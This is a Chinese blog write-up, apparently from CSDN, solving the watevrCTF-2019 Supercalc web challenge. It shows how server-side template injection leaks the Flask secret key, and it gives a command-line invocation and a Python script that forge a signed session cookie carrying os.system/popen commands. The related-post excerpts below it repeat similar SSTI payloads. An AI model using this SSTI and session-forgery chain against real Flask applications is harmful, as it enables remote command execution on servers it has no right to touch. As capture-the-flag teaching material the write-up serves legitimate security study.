[watevrCTF-2019]Supercalc

已于 2022-09-02 13:40:30 修改
阅读量393 收藏
点赞数
分类专栏: BUUCTF 文章标签: flask python
于 2022-09-02 12:12:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/126659972
版权

目录

考点:

解题:

伪造cookie执行命令:

总结:

考点:

flask-session 伪造

key 值搜寻

解题:

进入环境,输入 1+1 会出现 2   

应该是SSTI。但是输入{{1+1}} 会出现 :You cant use ast.Set m8

提示我们语法错误。

尝试输入 1/0 看看会不会报错,

 果然,并且 把我们的错误语句 报出来了, 那么既然把我们的语句爆出来了 ,那么是否可以利用报错的回显来获取信息呢?

尝试输入1/0{{1+2}}  ,还是 Check your syntax m8

但是把 1/0 后面的内容注释掉 就可以 报错返回 1/0#3

 那他确实是 执行了 {{}} 里的内容并且返回 回来了,相比正常的ssti 也就加了个 # 。

正常思路,我们先看一下  config  

 看到 又secret key 应该是伪造 flask seesion 。

抓包也是能够看见session 的。。解密出来正是我们之前输入的 值

伪造cookie执行命令:

python3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f0907855f7" -t "{'history': [{'code': '__import__(os).system("ls ")'}]}"

 如果 不行的话   可以用python 来运行此脚本 也能得到payload。

from flask.sessions import SecureCookieSessionInterface

secret_key = "你的key"

class FakeApp:
    secret_key = secret_key


fake_app = FakeApp()
session_interface = SecureCookieSessionInterface()
serializer = session_interface.get_signing_serializer(fake_app)
cookie = serializer.dumps(
    {"history": [{"code": '__import__("os").popen("ls ").read()'}]}
)
print(cookie)

插入 抓包插入seesion 里得到flag

总结:

。。。。

snowlyzz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[watevrCTF-2019]Supercalc 1
shinygod的博客
03-02 568
知识点:flask-session伪造*,key值寻找 目录解密:加密伪造:分析解题 解密: exp python3 flask_session.py decode -c '你的session' 加密伪造: python3 flask_session_cookie_manager3.py encode -s "key" -t "{'history':[{'code':'__import__(os).system(\"ls \")'}]}"``` 或者直接用下面的直接构造 from flask.sess
BUUCTF--[watevrCTF-2019]Supercalc
qq_46263951的博客
08-12 292
打开页面后发现其功能是进行计算 使用jwt解析可以发现我们所提交的内容在session中 通过1/0进行报错,用#注释来进行绕过, 执行命令可以得到加密session时所需的key 根据上面的测试我们可以知道这里是一个Flask_SSTI,所以使用flask-session-cookie加密脚本 使用ls命令查看当前目录下的所有文件 python3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f09078..
BUUCTF [watevrCTF-2019] Supercalc
Senimo
12-20 795
BUUCTF [watevrCTF-2019] Supercalc 考点: session伪造 通过session拼接语句 {{config}}获取SECRET_KEY的值 启动环境: 是一个类似计算机的功能,又一个输入框,尝试输入1+1: 得到计算结果,开始想到的是SQL注入,简单测试了几个payload,都没太有反应,继续对题目进行信息收集 在HTTP请求中,查看到Cookie信息: 可以获取到session: session=eyJoaXN0b3J5IjpbeyJjb2RlIjoiMSArI
CP-M-for-OS-X:z80仿真器+ CPM-80重新实现,旨在允许在OS X下使用原始CPM软件
02-04
CP-M-for-OS-X:z80仿真器+ CPM-80重新实现,旨在允许在OS X下使用原始CPM软件
[2019watevrCTF]Supercalc wireup
ShenZ的博客
01-19 264
[2019watevrCTF]Supercalc wireup calc!这个界面看着就像ssti <class 'os._wrap_close'>是118个 利用os._wrap_close类中的popen读取目录 ''.__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('ls').read() __import__("os").popen("cat flag.txt").read()
[watevrCTF-2019]Supercalc flask-cookie伪造&SSTI
a3320315的博客
02-12 1946
题目 buu新上的题目,晚上没啥事情就做了一下~~ 打开页面是一个计算器 可以执行一些简单的运算,我们还是老实地按步骤走,先扫下目录,没发现什么东西,然后查看header,源码等,都没有发现思路,然后我们看了一下cookie 这个凭直觉都知道是flask的cooike,然后我们放到脚本里面解一下 这不是我们先前的计算么? 那么思路就很明显了,肯定是伪造cooike,那么我们就不必须拿到key才可...
基于python flask +pyecharts实现的气象数据可视化分析大屏
weixin_49081159的博客
05-28 700
气象数据可视化分析大屏基于Python Flask和Pyecharts技术,旨在通过图表展示气象数据的分析结果,提供直观的数据展示和分析功能。在当今信息化时代,气象数据的准确性和实时性对各行业具有重要意义。通过搭建气象数据可视化分析大屏,用户可以实时监测和分析气象数据趋势,帮助决策者制定有效的应对措施。该系统将为气象领域的研究人员、气象服务机构和相关行业提供强大的数据分析和决策支持,推动气象信息化应用的发展和提升。
初探Flask:Pycharm社区版创建Flask项目
Mo_Chen的博客
05-29 470
本文将带您一步步创建一个简单的Flask项目,包括设置Python环境、安装Flask库以及创建基本的项目结构。使用命令行安装Flask 在使用Flask前,您需要先下载安装Flask库。打开终端,输入以下命令:
基于python flask的旅游数据大屏实现,有爬虫有数据库
weixin_49081159的博客
05-29 1505
随着旅游行业的快速发展,数据在旅游决策和规划中的重要性日益凸显。基于 Python Flask 的旅游数据大屏实现研究旨在结合爬虫技术和数据库存储,为用户提供全面、实时的旅游信息展示平台。爬虫技术作为数据采集的重要手段,能够从各种网络数据源中高效地抓取和提取信息。通过自动化爬虫程序,可以实现对各大旅游网站、景点信息平台和交通服务网站的数据采集,实时获取旅游相关数据并保持更新。数据库的运用则能够有效管理和存储大量的旅游数据,为后续的数据处理和展示提供支持。
Flask-app.py运行】已解决Cannot run program “D:\APP\python\python.exe”
你不来,再美的天地,都狼藉 ~
05-31 214
Cannot run program “D:\APP\python\python.exe” (in directory “F:\Codes\竞赛\大计赛\group\code\web\web”): CreateProcess error=2, 系统找不到指定的文件。
基于python flask的旅游景点评论数据可视化大屏实现,包括数据采集
weixin_49081159的博客
05-30 520
在旅游行业中,了解游客对旅游景点的评论和评价对于景点管理和市场营销至关重要。通过采集旅游景点评论数据并进行可视化分析,可以帮助景点管理者更好地了解游客对景点的看法和体验,发现优劣势,优化服务和提升用户满意度。基于Python Flask框架,搭建旅游景点评论数据可视化大屏,不仅可以展示评论情感分析结果、关键词词频分布,还能通过图表展示不同景点的评分趋势、热门景点排名等信息,为景点管理者提供直观的数据分析和决策支持。
基于python flask+pyecharts实现的中药数据可视化大屏,实现基于Apriori算法的药品功效关系的关联规则
weixin_49081159的博客
05-29 1026
在中医药学中,物品与功效之间的关联关系研究是一个非常重要的课题。传统中医药学中,很多药物都具有多种功效,而且不同药物对同一种疾病可能具有不同的疗效。因此,挖掘物品与功效之间的关联关系,可以帮助我们更加准确地认识和应用中医药宝库中的药物,从而提高中医药学的治疗效果和水平。随着信息技术的快速发展,Python作为一种流行的编程语言,已经被广泛应用于中医药学领域。Python具有丰富的第三方库和工具,例如NumPy、Pandas、Matplotlib等,这些库和工具为中医药学数据挖掘提供了丰富的工具和支持。
如何mysql数据导入到mongdb
codemami的博客
05-30 1179
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
Pandas03
Bianca427的博客
05-27 1557
聚合计算时新增一列计算最大值与平均值的差值df.groupby('district').agg(最低工资=('salary', 'min'), 最高工资=('salary', 'max'), 平均工资=('salary', 'mean'), 最大值与均值差值=('salary', myfunc)).rename_axis(["行政区"])
深入理解Python中None和““的区别
m0_54701273的博客
05-27 987
Python的世界里,None和空字符串""经常被用作默认值或用于表示缺省值的情况。尽管它们在某些语境下似乎可互换,但实际上None和""在Python中有着根本的区别。
Python自动化脚本:文件分类
最新发布
svygh123的专栏
06-01 190
要使用Python根据文件类型进行分类,可以遍历指定目录下的所有文件,检查每个文件的扩展名,然后根据扩展名将文件移动到对应的文件夹中。
yolov8 ultralytics库实现多机多卡DDP训练
weixin_42357472的博客
05-27 629
用的https://universe.roboflow.com/deneme-yz/sigara-deneme/dataset/2 数据集进行训练的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值